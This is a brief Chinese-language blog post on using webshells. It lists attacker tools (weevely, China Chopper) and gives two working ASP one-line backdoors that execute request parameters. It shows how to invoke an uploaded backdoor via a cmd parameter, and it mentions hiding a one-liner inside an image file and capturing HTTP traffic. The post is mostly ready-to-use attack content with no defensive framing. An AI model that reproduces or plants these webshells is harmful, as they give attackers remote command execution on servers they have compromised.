乐趣区

webshell利用

一句话工具
weevely,中国菜刀

asp 一句话木马
<%execute request(“value”)%>

我们上传了一句话木马后,可用中国菜刀进行连接
<%eval request(“cmd”)%>

原理:执行 http://xxxx/a.asp?cmd=phpinfo()
a.asp 是一句话木马所在的位置

制作图片一句话
C32asm

抓 http 包
wsexplorer 根据应用显示抓的包

退出移动版